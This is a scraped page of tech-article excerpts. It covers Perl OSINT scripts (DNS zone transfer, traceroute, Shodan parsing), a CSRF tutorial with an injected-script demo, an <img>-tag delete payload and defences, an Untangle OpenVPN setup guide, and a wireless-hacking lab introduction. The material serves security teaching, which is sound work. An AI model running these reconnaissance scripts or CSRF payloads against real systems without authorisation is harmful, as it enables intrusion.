Net::DNS::RR object    } }else{ # 0 returned domains    print "[>] Transfer failed on " . $rr->nsdname . "n"; } } }else{ # Something went wrong: warn "query failed: ", $res->errorstring,"n"; } The preceding program that uses the Net::DNS Perl module will first query for the name servers used by our target and then test the DNS zone transfer for each target. The grep() function returns a list to the foreach() loop of all name servers (NS) found. The foreach() loop then simply attempts the DNS zone transfer (AXFR) and returns the results if the array is larger than zero elements. Let's test the output on our client target: [trevelyn@shell ~]$ perl dnsZt.pl warcarrier.org [>] Testing NS Server: hank.ns.cloudflare.com [!] Successful zone transfer: warcarrier.org warcarrier.org admin.warcarrier.org gateway.warcarrier.org remote.warcarrier.org partner.warcarrier.org calendar.warcarrier.org direct.warcarrier.org [>] Testing NS Server: beth.ns.cloudflare.com [>] Transfer failed on beth.ns.cloudflare.com [trevelyn@shell ~]$ The preceding (trimmed) output is a successful DNS zone transfer on one of the name servers used by our client target. Traceroute With knowledge of how to glean hostnames and IP addresses from simple queries using Perl, we can take the OSINT a step further and trace our route to the hosts to see what potential target-owned hardware can intercept or relay traffic. For this task, we will use the Net::Traceroute Perl module. Let's take a look at how we can get the IP host information from relaying hosts between us and our target, using this Perl module and the following code: #!/usr/bin/perl -w use strict; use Net::Traceroute; my $dom = shift or die "Usage: perl tracert.pl <domain>"; print "Tracing route to ",$dom,"n"; my $tr = Net::Traceroute->new(host=>$dom,use_tcp=>1); for(my$i=1;$i<=$tr->hops;$i++){        my $hop = $tr->hop_query_host($i,0);        print "IP: ",$hop," hop time: ",$tr->hop_query_time($i,0),               "ms hop status: ",$tr->hop_query_stat($i,0),                " query count: ",$tr->hop_queries($i),"n" if($hop); } In the preceding Perl program, we used the Net::Traceroute Perl module to perform a trace route to the domain given by a command-line argument. The module must be used by first calling the new() method, which we do when defining $tr as a query object. We tell the trace route object $tr that we want to use TCP and also pass the host, which we shift from the command-line arguments. We can pass a lot more parameters to the new() method, one of which is debug=>9 to debug our trace route. A full list can be obtained from the CPAN Search page of the Perl module that can be accessed at http://search.cpan.org/~hag/Net-Traceroute/Traceroute.pm. The hops method is used when constructing the for() loop, which returns an integer value of the hop count. We then assign this to $i and loop through all hop and print statistics, using the methods hop_query_host for the IP address of the host, hop_query_time for the time taken to reach the host, and hop_query_stat that returns the status of the query as an integer value (on our lab machines, it is returned in milliseconds), which can be mapped to the export list of Net::Traceroute according to the module's documentation. Now, let's test this trace route program with a domain and check the output: root@wnld960:~# sudo perl tracert.pl weaknetlabs.com Tracing route to weaknetlabs.com IP: 10.0.0.1 hop time: 0.724ms hop status: 0 query count: 3 IP: 68.85.73.29 hop time: 14.096ms hop status: 0 query count: 3 IP: 69.139.195.37 hop time: 19.173ms hop status: 0 query count: 3 IP: 68.86.94.189 hop time: 31.102ms hop status: 0 query count: 3 IP: 68.86.87.170 hop time: 27.42ms hop status: 0 query count: 3 IP: 50.242.150.186 hop time: 27.808ms hop status: 0 query count: 3 IP: 144.232.20.144 hop time: 33.688ms hop status: 0 query count: 3 IP: 144.232.25.30 hop time: 38.718ms hop status: 0 query count: 3 IP: 144.232.229.46 hop time: 31.242ms hop status: 0 query count: 3 IP: 144.232.9.82 hop time: 99.124ms hop status: 0 query count: 3 IP: 198.144.36.192 hop time: 30.964ms hop status: 0 query count: 3 root@wnld960:~# The output from tracert.pl is just as we expected using the traceroute program of the Linux shell. This functionality can be easily built right into our port scanner application. Shodan Shodan is an online resource that can be used for hardware searching within a specific domain. For instance, a search for hostname:<domain> will provide all the hardware entities found within this specific domain. Shodan is both a public and open source resource for intelligence. Harnessing the full power of Shodan and returning a multipage query is not free. For the examples in this article, the first page of the query results, which are free, were sufficient to provide a suitable amount of information. The returned output is XML, and Perl has some great utilities to parse XML. Luckily, for the purpose of our example, Shodan offers an example query for us to use as export_sample.xml. This XML file contains only one node per host, labeled host. This node contains attributes for the corresponding host and we will use the XML::LibXML::Node class from the XML::LibXML::Node Perl module. First, we will download the XML file and use XML::LibXML to open the local file with the parse_file() method, as shown in the following code: #!/usr/bin/perl -w use strict; use XML::LibXML; my $parser = XML::LibXML->new(); my $doc = $parser->parse_file("export_sample.xml"); foreach my $host ($doc->findnodes('/shodan/host')) { print "Host Found:n"; my @attribs = $host->attributes('/shodan/host'); foreach my $host (@attribs){ # get host attributes print $host =~ m/([^=]+)=.*/," => "; print $host =~ m/.*"([^"]+)"/,"n"; } # next print "nn"; } The preceding Perl program will open the export_sample.xml file and navigate through the host nodes using the simple xpath of /shodan/host. For each <host> node, we call the attribute's method from the XML::LibXML::Node class, which returns an array of all attributes with information such as the IP address, hostname, and more. We then run a regular expression pattern on the $host string to parse out the key, and again with another regexp to get the value. Let's see how this returns data from our sample XML file from ShodanHQ.com: root@wnld960:~#perl shodan.pl Host Found: hostnames => internetdevelopment.ro ip => 109.206.71.21 os => Linux recent 2.4 port => 80 updated => 16.03.2010 Host Found: ip => 113.203.71.21 os => Linux recent 2.4 port => 80 updated => 16.03.2010 Host Found: hostnames => ip-173-201-71-21.ip.secureserver.net ip => 173.201.71.21 os => Linux recent 2.4 port => 80 updated => 16.03.2010 The preceding output is from our shodan.pl Perl program. It loops through all host nodes and prints the attributes. As we can see, Shodan can provide us with some very useful information that we can possibly use to exploit later in our penetration testing. It's also easy to see, without going into elementary Perl coding examples, that we can find exactly what we are looking for from an XML object's attributes using this simple method. We can use this code for other resources as well. More intelligence Gaining information about the actual physical address is also important during a penetration test. Sure, this is public information, but where do we find it? Well, the PTES describes how most states require a legal entity of a company to register with the State Division, which can provide us with a one-stop go-to place for the physical address information, entity ID, service of process agent information, and more. This can be very useful information on our client target. If obtained, we can extend this intelligence by finding out more about the property owners for physical penetration testing and social engineering by checking the city/county's department of land records, real estate, deeds, or even mortgages. All of this data, if hosted on the Web, can be gathered by automated Perl programs, as we did in the example sections of this article using LWP::UserAgent. Summary As we have seen, being creative with our information-gathering techniques can really shine with the power of regular expressions and the ability to spider links. As we learned in the introduction, it's best to do an automated OSINT gathering process along with a manual process because both processes can reveal information that one might have missed. Resources for Article: Further resources on this subject: Ruby and Metasploit Modules [article] Linux Shell Scripting – various recipes to help you [article] Linux Shell Script: Logging Tasks [article]
Read more
  • 0
  • 0
  • 9960

article-image-cross-site-request-forgery
Packt
17 Nov 2014
9 min read
Save for later

Cross-site Request Forgery

Packt
17 Nov 2014
9 min read
In this article by Y.E Liang, the author of JavaScript Security, we will cover cross-site forgery. This topic is not exactly new. In this article, we will go deeper into cross-site forgery and learn the various techniques of defending against it. (For more resources related to this topic, see here.) Introducing cross-site request forgery Cross-site request forgery (CSRF) exploits the trust that a site has in a user's browser. It is also defined as an attack that forces an end user to execute unwanted actions on a web application in which the user is currently authenticated. Examples of CSRF We will now take a look at a basic CSRF example: Go to the source code and change the directory. Run the following command: python xss_version.py Remember to start your MongoDB process as well. Next, open external.html found in templates, in another host, say http://localhost:8888. You can do this by starting the server, which can be done by running pyton xss_version.py –port=8888, and then visiting http://loaclhost:8888/todo_external. You will see the following screenshot: Adding a new to-do item Click on Add To Do, and fill in a new to-do item, as shown in the following screenshot: Adding a new to-do item and posting it Next, click on Submit. Going back to your to-do list app at http://localhost:8000/todo and refreshing it, you will see the new to-do item added to the database, as shown in the following screenshot: To-do item is added from an external app; this is dangerous! To attack the to-do list app, all we need to do is add a new item that contains a line of JavaScript, as shown in the following screenshot: Adding a new to do for the Python version Now, click on Submit. Then, go back to your to-do app at http://localhost:8000/todo, and you will see two subsequent alerts, as shown in the following screenshot: Successfully injected JavaScript part 1 So here's the first instance where CSRF happens: Successfully injected JavaScript part 2 Take note that this can happen to the other backend written in other languages as well. Now go to your terminal, turn off the Python server backend, and change the directory to node/. Start the node server by issuing this command: node server.js This time around, the server is running at http://localhost:8080, so remember to change the $.post() endpoint to http://localhost:8080 instead of http://localhost:8000 in external.html, as shown in the following code:    function addTodo() {      var data = {        text: $('#todo_title').val(),        details:$('#todo_text').val()      }      // $.post('http://localhost:8000/api/todos', data,      function(result) {      $.post('http://localhost:8080/api/todos', data,      function(result) {        var item = todoTemplate(result.text, result.details);        $('#todos').prepend(item);        $("#todo-form").slideUp();      })    } The line changed is found at addTodo(); the highlighted code is the correct endpoint for this section. Now, going back to external.html, add a new to-do item containing JavaScript, as shown in the following screenshot: Trying to inject JavaScript into a to-do app based on Node.js As usual, submit the item. Go to http://localhost:8080/api/ and refresh; you should see two alerts (or four alerts if you didn't delete the previous ones). The first alert is as follows: Successfully injected JavaScript part 1 The second alert is as follows: Successfully injected JavaScript part 1 Now that we have seen what can happen to our app if we suffered a CSRF attack, let's think about how such attacks can happen. Basically, such attacks can happen when our API endpoints (or URLs accepting the requests) are not protected at all. Attackers can exploit such vulnerabilities by simply observing which endpoints are used and attempt to exploit them by performing a basic HTTP POST operation to it. Basic defense against CSRF attacks If you are using modern frameworks or packages, the good news is that you can easily protect against such attacks by turning on or making use of CSRF protection. For example, for server.py, you can turn on xsrf_cookie by setting it to True, as shown in the following code: class Application(tornado.web.Application):    def __init__(self):        handlers = [            (r"/api/todos", Todos),            (r"/todo", TodoApp)          ]        conn = pymongo.Connection("localhost")        self.db = conn["todos"]        settings = dict(            xsrf_cookies=True,            debug=True,            template_path=os.path.join(os.path.dirname(__file__),            "templates"),            static_path=os.path.join(os.path.dirname(__file__),            "static")        )        tornado.web.Application.__init__(self, handlers, **settings) Note the highlighted line, where we set xsrf_cookies=True. Have a look at the following code snippet: var express   = require('express'); var bodyParser = require('body-parser'); var app       = express(); var session   = require('cookie-session'); var csrf   = require('csrf');   app.use(csrf()); app.use(bodyParser()); The highlighted lines are the new lines (compared to server.js) to add in CSRF protection. Now that both backends are equipped with CSRF protection, you can try to make the same post from external.html. You will not be able to make any post from external.html. For example, you can open Chrome's developer tool and go to Network. You will see the following: POST forbidden On the terminal, you will see a 403 error from our Python server, which is shown in the following screenshot: POST forbidden from the server side Other examples of CSRF CSRF can also happen in many other ways. In this section, we'll cover the other basic examples on how CSRF can happen. CSRF using the <img> tags This is a classic example. Consider the following instance: <img src=http://yousite.com/delete?id=2 /> Should you load a site that contains this img tag, chances are that a piece of data may get deleted unknowingly. Now that we have covered the basics of preventing CSRF attacks through the use of CSRF tokens, the next question you may have is: what if there are times when you need to expose an API to an external app? For example, Facebook's Graph API, Twitter's API, and so on, allow external apps not only to read, but also write data to their system. How do we prevent malicious attacks in this situation? We'll cover this and more in the next section. Other forms of protection Using CSRF tokens may be a convenient way to protect your app from CSRF attacks, but it can be a hassle at times. As mentioned in the previous section, what about the times when you need to expose an API to allow mobile access? Or, your app is growing so quickly that you want to accelerate that growth by creating a Graph API of your own. How do you manage it then? In this section, we will go quickly over the techniques for protection. Creating your own app ID and app secret – OAuth-styled Creating your own app ID and app secret is similar to what the major Internet companies are doing right now: we require developers to sign up for developing accounts and to attach an application ID and secret key for each of the apps. Using this information, the developers will need to exchange OAuth credentials in order to make any API calls, as shown in the following screenshot: Google requires developers to sign up, and it assigns the client ID On the server end, all you need to do is look for the application ID and secret key; if it is not present, simply reject the request. Have a look at the following screenshot: The same thing with Facebook; Facebook requires you to sign up, and it assigns app ID and app secret Checking the Origin header Simply put, you want to check where the request is coming from. This is a technique where you can check the Origin header. The Origin header, in layman's terms, refers to where the request is coming from. There are at least two use cases for the usage of the Origin header, which are as follows: Assuming your endpoint is used internally (by your own web application) and checking whether the requests are indeed made from the same website, that is, your website. If you are creating an endpoint for external use, such as those similar to Facebook's Graph API, then you can make those developers register the website URL where they are going to use the API. If the website URL does not match with the one that is being registered, you can reject this request. Note that the Origin header can also be modified; for example, an attacker can provide a header that is modified. Limiting the lifetime of the token Assuming that you are generating your own tokens, you may also want to limit the lifetime of the token, for instance, making the token valid for only a certain time period if the user is logged in to your site. Similarly, your site can make this a requirement in order for the requests to be made; if the token does not exist, HTTP requests cannot be made. Summary In this article, we covered the basic forms of CSRF attacks and how to defend against it. Note that these security loopholes can come from both the frontend and server side. Resources for Article: Further resources on this subject: Implementing Stacks using JavaScript [Article] Cordova Plugins [Article] JavaScript Promises – Why Should I Care? [Article]
Read more
  • 0
  • 0
  • 1632
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-untangle-vpn-services
Packt
30 Oct 2014
18 min read
Save for later

Untangle VPN Services

Packt
30 Oct 2014
18 min read
This article by Abd El-Monem A. El-Bawab, the author of Untangle Network Security, covers the Untangle solution, OpenVPN. OpenVPN is an SSL/TLS-based VPN, which is mainly used for remote access as it is easy to configure and uses clients that can work on multiple operating systems and devices. OpenVPN can also provide site-to-site connections (only between two Untangle servers) with limited features. (For more resources related to this topic, see here.) OpenVPN Untangle's OpenVPN is an SSL-based VPN solution that is based on the well-known open source application, OpenVPN. Untangle's OpenVPN is mainly used for client-to-site connections with a client feature that is easy to deploy and configure, which is widely available for Windows, Mac, Linux, and smartphones. Untangle's OpenVPN can also be used for site-to-site connections but the two sites need to have Untangle servers. Site-to-site connections between Untangle and third-party devices are not supported. How OpenVPN works In reference to the OSI model, an SSL/TLS-based VPN will only encrypt the application layer's data, while the lower layer's information will be transferred unencrypted. In other words, the application packets will be encrypted. The IP addresses of the server and client are visible; the port number that the server uses for communication between the client and server is also visible, but the actual application port number is not visible. Furthermore, the destination IP address will not be visible; only the VPN server IP address is seen. Secure Sockets Layer (SSL) and Transport Layer Security (TLS) refer to the same thing. SSL is the predecessor of TLS. SSL was originally developed by Netscape and many releases were produced (V.1 to V.3) till it got standardized under the TLS name. The steps to create an SSL-based VPN are as follows: The client will send a message to the VPN server that it wants to initiate an SSL session. Also, it will send a list of all ciphers (hash and encryption protocols) that it supports. The server will respond with a set of selected ciphers and will send its digital certificate to the client. The server's digital certificate includes the server's public key. The client will try to verify the server's digital certificate by checking it against trusted certificate authorities and by checking the certificate's validity (valid from and valid through dates). The server may need to authenticate the client before allowing it to connect to the internal network. This could be achieved either by asking for a valid username and password or by using the user's digital identity certificates. Untangle NGFW uses the digital certificates method. The client will create a session key (which will be used to encrypt the transferred data between the two devices) and will send this key to the server encrypted using the server's public key. Thus, no third party can get the session key as the server is the only device that can decrypt the session key as it's the only party that has the private key. The server will acknowledge the client that it received the session key and is ready for the encrypted data transformation. Configuring Untangle's OpenVPN server settings After installing the OpenVPN application, the application will be turned off. You'll need to turn it on before you can use it. You can configure Untangle's OpenVPN server settings under OpenVPN settings | Server. The settings configure how OpenVPN will be a server for remote clients (which can be clients on Windows, Linux, or any other operating systems, or another Untangle server). The different available settings are as follows: Site Name: This is the name of the OpenVPN site that is used to define the server among other OpenVPN servers inside your origination. This name should be unique across all Untangle servers in the organization. A random name is automatically chosen for the site name. Site URL: This is the URL that the remote client will use to reach this OpenVPN server. This can be configured under Config | Administration | Public Address. If you have more than one WAN interface, the remote client will first try to initiate the connection using the settings defined in the public address. If this fails, it will randomly try the IP of the remaining WAN interfaces. Server Enabled: If checked, the OpenVPN server will run and accept connections from the remote clients. Address Space: This defines the IP subnet that will be used to assign IPs for the remote VPN clients. The value in Address Space must be unique and separate across all existing networks and other OpenVPN address spaces. A default address space will be chosen that does not conflict with the existing configuration: Configuring Untangle's OpenVPN remote client settings Untangle's OpenVPN allows you to create OpenVPN clients to give your office employees, who are out of the company, the ability to remotely access your internal network resources via their PCs and/or smartphones. Also, an OpenVPN client can be imported to another Untangle server to provide site-to-site connection. Each OpenVPN client will have its unique IP (from the address space range defined previously). Thus, each OpenVPN client can only be used for one user. For multiple users, you'll have to create multiple clients as using the same client for multiple users will result in client disconnection issues. Creating a remote client You can create remote access clients by clicking on the Add button located under OpenVPN Settings | Server | Remote Clients. A new window will open, which has the following settings: Enabled: If this checkbox is checked, it will allow the client connection to the OpenVPN server. If unchecked, it will not allow the client connection. Client Name: Give a unique name for the client; this will help you identify the client. Only alphanumeric characters are allowed. Group: Specify the group the client will be a member of. Groups are used to apply similar settings to their members. Type: Select Individual Client for remote access and Network for site-to-site VPN. The following screenshot shows a remote access client created for JDoe: After configuring the client settings, you'll need to press the Done button and then the OK or Apply button to save this client configuration. The new client will be available under the Remote Clients tab, as shown in the following screenshot: Understanding remote client groups Groups are used to group clients together and apply similar settings to the group members. By default, there will be a Default Group. Each group has the following settings: Group Name: Give a suitable name for the group that describes the group settings (for example, full tunneling clients) or the target clients (for example, remote access clients). Full Tunnel: If checked, all the traffic from the remote clients will be sent to the OpenVPN server, which allows Untangle to filter traffic directed to the Internet. If unchecked, the remote client will run in the split tunnel mode, which means that the traffic directed to local resources behind Untangle is sent through VPN, and the traffic directed to the Internet is sent by the machine's default gateway. You can't use Full Tunnel for site-to-site connections. Push DNS: If checked, the remote OpenVPN client will use the DNS settings defined by the OpenVPN server. This is useful to resolve local names and services. Push DNS server: If the OpenVPN server is selected, remote clients will use the OpenVPN server for DNS queries. If set to Custom, DNS servers configured here will be used for DNS queries. Push DNS Custom 1: If the Push DNS server is set to Custom, the value configured here will be used as a primary DNS server for the remote client. If blank, no settings will be pushed for the remote client. Push DNS Custom 2: If the Push DNS server is set to Custom, the value configured here will be used as a secondary DNS server for the remote client. If blank, no settings will be pushed for the remote client. Push DNS Domain: The configured value will be pushed to the remote clients to extend their domain's search path during DNS resolution. The following screenshot illustrates all these settings: Defining the exported networks Exported networks are used to define the internal networks behind the OpenVPN server that the remote client can reach after successful connection. Additional routes will be added to the remote client's routing table that state that the exported networks (the main site's internal subnet) are reachable through the OpenVPN server. By default, each static non-WAN interface network will be listed in the Exported Networks list: You can modify the default settings or create new entries. The Exported Networks settings are as follows: Enabled: If checked, the defined network will be exported to the remote clients. Export Name: Enter a suitable name for the exported network. Network: This defines the exported network. The exported network should be written in CIDR form. These settings are illustrated in the following screenshot: Using OpenVPN remote access clients So far, we have been configuring the client settings but didn't create the real package to be used on remote systems. We can get the remote client package by pressing the Download Client button located under OpenVPN Settings | Server | Remote Clients, which will start the process of building the OpenVPN client that will be distributed: There are three available options to download the OpenVPN client. The first option is to download the client as a .exe file to be used with the Windows operating system. The second option is to download the client configuration files, which can be used with the Apple and Linux operating systems. The third option is similar to the second one except that the configuration file will be imported to another Untangle NGFW server, which is used for site-to-site scenarios. The following screenshot illustrates this: The configuration files include the following files: <Site_name>.ovpn <Site_name>.conf Keys<Site_name>.-<User_name>.crt Keys<Site_name>.-<User_name>.key Keys<Site_name>.-<User_name>-ca.crt The certificate files are for the client authentication, and the .ovpn and .conf files have the defined connection settings (that is, the OpenVPN server IP, used port, and used ciphers). The following screenshot shows the .ovpn file for the site Untangle-1849: As shown in the following screenshot, the created file (openvpn-JDoe-setup.exe) includes the client name, which helps you identify the different clients and simplifies the process of distributing each file to the right user: Using an OpenVPN client with Windows OS Using an OpenVPN client with the Windows operating system is really very simple. To do this, perform the following steps: Set up the OpenVPN client on the remote machine. The setup is very easy and it's just a next, next, install, and finish setup. To set up and run the application as an administrator is important in order to allow the client to write the VPN routes to the Windows routing table. You should run the client as an administrator every time you use it so that the client can create the required routes. Double-click on the OpenVPN icon on the Windows desktop: The application will run in the system tray: Right-click on the system tray of the application and select Connect. The client will start to initiate the connection to the OpenVPN server and a window with the connection status will appear, as shown in the following screenshot: Once the VPN tunnel is initiated, a notification will appear from the client with the IP assigned to it, as shown in the following screenshot: If the OpenVPN client was running in the task bar and there was an established connection, the client will automatically reconnect to the OpenVPN server if the tunnel was dropped due to Windows being asleep. By default, the OpenVPN client will not start at the Windows login. We can change this and allow it to start without requiring administrative privileges by going to Control Panel | Administrative Tools | Services and changing the OpenVPN service's Startup Type to automatic. Now, in the start parameters field, put –-connect <Site_name>.ovpn; you can find the <site_name>.ovpn under C:Program FilesOpenVPNconfig. Using OpenVPN with non-Windows clients The method to configure OpenVPN clients to work with Untangle is the same for all non-Windows clients. Simply download the .zip file provided by Untangle, which includes the configuration and certificate files, and place them into the application's configuration folder. The steps are as follows: Download and install any of the following OpenVPN-compatible clients for your operating system: For Mac OS X, Untangle, Inc. suggests using Tunnelblick, which is available at http://code.google.com/p/tunnelblick For Linux, OpenVPN clients for different Linux distros can be found at https://openvpn.net/index.php/access-server/download-openvpn-as-sw.html OpenVPN connect for iOS is available at https://itunes.apple.com/us/app/openvpn-connect/id590379981?mt=8 OpenVPN for Android 4.0+ is available at https://play.google.com/store/apps/details?id=net.openvpn.openvpn Log in to the Untangle NGFW server, download the .zip client configuration file, and extract the files from the .zip file. Place the configuration files into any of the following OpenVPN-compatible applications: Tunnelblick: Manually copy the files into the Configurations folder located at ~/Library/Application Support/Tunnelblick. Linux: Copy the extracted files into /etc/openvpn, and then you can connect using sudo openvpn /etc/openvpn/<Site_name>.conf. iOS: Open iTunes and select the files from the config ZIP file to add to the app on your iPhone or iPad. Android: From OpenVPN for an Android application, click on all your precious VPNs. In the top-right corner, click on the folder, and then browse to the folder where you have the OpenVPN .Conf file. Click on the file and hit Select. Then, in the top-right corner, hit the little floppy disc icon to save the import. Now, you should see the imported profile. Click on it to connect to the tunnel. For more information on this, visit http://forums.untangle.com/openvpn/30472-openvpn-android-4-0-a.html. Run the OpenVPN-compatible client. Using OpenVPN for site-to-site connection To use OpenVPN for site-to-site connection, one Untangle NGFW server will run on the OpenVPN server mode, and the other server will run on the client mode. We will need to create a client that will be imported in the remote server. The client settings are shown in the following screenshot: We will need to download the client configuration that is supposed to be imported on another Untangle server (the third option available on the client download menu), and then import this client configuration's zipped file on the remote server. To import the client, on the remote server under the Client tab, browse to the .zip file and press the Submit button. The client will be shown as follows: You'll need to restart the two servers before being able to use the OpenVPN site-to-site connection. The site-to-site connection is bidirectional. Reviewing the connection details The current connected clients (either they were OS clients or another Untangle NGFW client) will appear under Connected Remote Clients located under the Status tab. The screen will show the client name, its external address, and the address assigned to it by OpenVPN. In addition to the connection start time, the amount of transmitted and received MB during this connection is also shown: For the site-to-site connection, the client server will show the name of the remote server, whether the connection is established or not, in addition to the amount of transmitted and received data in MB: Event logs show a detailed connection history as shown in the following screenshot: In addition, there are two reports available for Untangle's OpenVPN: Bandwidth usage: This report shows the maximum and average data transfer rate (KB/s) and the total amount of data transferred that day Top users: This report shows the top users connected to the Untangle OpenVPN server Troubleshooting Untangle's OpenVPN In this section, we will discuss some points to consider when dealing with Untangle NGFW OpenVPN. OpenVPN acts as a router as it will route between different networks. Using OpenVPN with Untangle NGFW in the bridge mode (Untangle NGFW server is behind another router) requires additional configurations. The required configurations are as follows: Create a static route on the router that will route any traffic from the VPN range (the VPN address pool) to the Untangle NGFW server. Create a Port Forward rule for the OpenVPN port 1194 (UDP) on the router to Untangle NGFW. Verify that your setting is correct by going to Config | Administration | Public Address as it is used by Untangle to configure OpenVPN clients, and ensure that the configured address is resolvable from outside the company. If the OpenVPN client is connected, but you can't access anything, perform the following steps: Verify that the hosts you are trying to reach are exported in Exported Networks. Try to ping Untangle NGFW LAN IP address (if exported). Try to bring up the Untangle NGFW GUI by entering the IP address in a browser. If the preceding tasks work, your tunnel is up and operational. If you can't reach any clients inside the network, check for the following conditions: The client machine's firewall is not preventing the connection from the OpenVPN client. The client machine uses Untangle as a gateway or has a static route to send the VPN address pool to Untangle NGFW. In addition, some port forwarding rules on Untangle NGFW are needed for OpenVPN to function properly. The required ports are 53, 445, 389, 88, 135, and 1025. If the site-to-site tunnel is set up correctly, but the two sites can't talk to each other, the reason may be as follows: If your sites have IPs from the same subnet (this probably happens when you use a service from the same ISP for both branches), OpenVPN may fail as it consider no routing is needed from IPs in the same subnet, you should ask your ISP to change the IPs. To get DNS resolution to work over the site-to-site tunnel, you'll need to go to Config | Network | Advanced | DNS Server | Local DNS Servers and add the IP of the DNS server on the far side of the tunnel. Enter the domain in the Domain List column and use the FQDN when accessing resources. You'll need to do this on both sides of the tunnel for it to work from either side. If you are using site-to-site VPN in addition to the client-to-site VPN. However, the OpenVPN client is able to connect to the main site only: You'll need to add VPN Address Pool to Exported Hosts and Networks Lab-based training This section will provide training for the OpenVPN site-to-site and client-to-site scenarios. In this lab, we will mainly use Untangle-01, Untangle-03, and a laptop (192.168.1.7). The ABC bank started a project with Acme schools. As a part of this project, the ABC bank team needs to periodically access files located on Acme-FS01. So, the two parties decided to opt for OpenVPN. However, Acme's network team doesn't want to leave access wide open for ABC bank members, so they set firewall rules to limit ABC bank's access to the file server only. In addition, the IT team director wants to have VPN access from home to the Acme network, which they decided to accomplish using OpenVPN. The following diagram shows the environment used in the site-to-site scenario: To create the site-to-site connection, we will need to do the following steps: Enable OpenVPN Server on Untangle-01. Create a network type client with a remote network of 172.16.1.0/24. Download the client and import it under the Client tab in Untangle-03. Restart the two servers. After the restart, you have a site-to-site VPN connection. However, the Acme network is wide open to the ABC bank, so we need to create a firewall-limiting rule. On Untangle-03, create a rule that will allow any traffic that comes from the OpenVPN interface, and its source is 172.16.136.10 (Untangle-01 Client IP) and is directed to 172.16.1.7 (Acme-FS01). The rule is shown in the following screenshot: Also, we will need a general block rule that comes after the preceding rule in the rule evaluation order. The environment used for the client-to-site connection is shown in the following diagram: To create a client-to-site VPN connection, we need to perform the following steps: Enable the OpenVPN server on Untangle-03. Create an individual client type client on Untangle-03. Distribute the client to the intended user (that is 192.168.1.7). Install OpenVPN on your laptop. Connect using the installed OpenVPN and try to ping Acme-DC01 using its name. The ping will fail because the client is not able to query the Acme DNS. So, in the Default Group settings, change Push DNS Domain to Acme.local. Changing the group settings will not affect the OpenVPN client till the client is restarted. Now, the ping process will be a success. Summary In this article, we covered the VPN services provided by Untangle NGFW. We went deeply into understanding how each solution works. This article also provided a guide on how to configure and deploy the services. Untangle provides a free solution that is based on the well-known open source OpenVPN, which provides an SSL-based VPN. Resources for Article: Further resources on this subject: Important Features of Gitolite [Article] Target Exploitation [Article] IPv6 on Packet Tracer [Article]
Read more
  • 0
  • 0
  • 7728

article-image-wireless-and-mobile-hacks
Packt
22 Jul 2014
6 min read
Save for later

Wireless and Mobile Hacks

Packt
22 Jul 2014
6 min read
(For more resources related to this topic, see here.) So I don't think it's possible to go to a conference these days and not see a talk on mobile or wireless. (They tend to schedule the streams to have both mobile and wireless talks at the same time—the sneaky devils. There is no escaping the wireless knowledge!) So, it makes sense that we work out some ways of training people how to skill up on these technologies. We're going to touch on some older vulnerabilities that you don't see very often, but as always, when you do, it's good to know how to insta-win. Wireless environment setup This article is a bit of an odd one, because with Wi-Fi and mobile, it's much harder to create a safe environment for your testers to work in. For infrastructure and web app tests, you can simply say, "it's on the network, yo" and they'll get the picture. However, Wi-Fi and mobile devices are almost everywhere in places that require pen testing. It's far too easy for someone to get confused and attempt to pwn a random bystander. While this sounds hilarious, it is a serious issue if that occurs. So, adhere to the following guidelines for safer testing: Where possible, try and test away from other people and networks. If there is an underground location nearby, testing becomes simpler as floors are more effective than walls for blocking Wi-Fi signals (contrary to the firmly held beliefs of anyone who's tried to improve their home network signal). If you're an individual who works for a company, or you know, has the money to make a Faraday cage, then by all means do the setup in there. I'll just sit here and be jealous. Unless it's pertinent to the test scenario, provide testers with enough knowledge to identify the devices and networks they should be attacking. A good way to go is to provide the Mac address as they very rarely collide. (Mac randomizing tools be damned.) If an evil network has to be created, name it something obvious and reduce the access to ensure that it is visible to as few people as possible. The naming convention we use is Connectingtomewillresultin followed by pain, death, and suffering. While this steers away the majority of people, it does appear to attract the occasional fool, but that's natural selection for you. Once again, but it is worth repeating, don't use your home network. Especially in this case, using your home equipment could expose you to random passersby or evil neighbors. I'm pretty sure my neighbor doesn't know how to hack, but if he does, I'm in for a world of hurt. Software We'll be using Kali Linux as the base for this article as we'll be using the tools provided by Kali to set up our networks for attack. Everything you need is built into Kali, but if you happen to be using another build such as Ubuntu or Debian, you will need the following tools: Iwtools (apt-get install iw): This is the wireless equivalent of ifconfig that allows the alteration of wireless adapters, and provides a handy method to monitor them. Aircrack suite (apt-get install aircrack-ng): The basic tools of wireless attacking are available in the Aircrack suite. This selection of tools provides a wide range of services, including cracking encryption keys, monitoring probe requests, and hosting rogue networks. Hostapd (apt-get install hostapd): Airbase-ng doesn't support WPA-2 networks, so we need to bring in the serious programs for serious people. This can also be used to host WEP networks, but getting Aircrack suite practice is not to be sniffed at. Wireshark (apt-get install wireshark): Wireshark is one of the most widely used network analytics tools. It's not only used by pen testers, but also by people who have CISSP and other important letters after their names. This means that it's a tool that you should know about. dnschef (https://thesprawl.org/projects/dnschef/): Thanks to Duncan Winfrey, who pointed me in this direction. DNSchef is a fantastic resource for doing DNS spoofing. Other alternatives include DNS spoof and Metasploit's Fake DNS. Crunch (apt-get install crunch): Crunch generates strings in a specified order. While it seems very simple, it's incredibly useful. Use with care though; it has filled more than one unwitting user's hard drive. Hardware You want to host a dodgy network. The first question to ask yourself, after the question you already asked yourself about software, is: is your laptop/PC capable of hosting a network? If your adapter is compatible with injection drivers, you should be fine. A quick check is to boot up Kali Linux and run sudo airmon-ng start <interface>. This will put your adapter in promiscuous mode. If you don't have the correct drivers, it'll throw an error. Refer to a potted list of compatible adapters at http://www.aircrack-ng.org/doku.php?id=compatibility_drivers. However, if you don't have access to an adapter with the required drivers, fear not. It is still possible to set up some of the scenarios. There are two options. The first and most obvious is "buy an adapter." I can understand that you might not have a lot of cash kicking around, so my advice is to pick up an Edimax ew-7711-UAN—it's really cheap and pretty compact. It has a short range and is fairly low powered. It is also compatible with Raspberry Pi and BeagleBone, which is awesome but irrelevant. The second option is a limited solution. Most phones on the market can be used as wireless hotspots and so can be used to set up profiles for other devices for the phone-related scenarios in this article. Unfortunately, unless you have a rare and epic phone, it's unlikely to support WEP, so that's out of the question. There are solutions for rooted phones, but I wouldn't instruct you to root your phone, and I'm most certainly not providing a guide to do so. Realistically, in order to create spoofed networks effectively and set up these scenarios, a computer is required. Maybe I'm just not being imaginative enough.
Read more
  • 0
  • 0
  • 3006

article-image-article-test123
Packt
16 Jul 2014
13 min read
Save for later

test-article

Packt
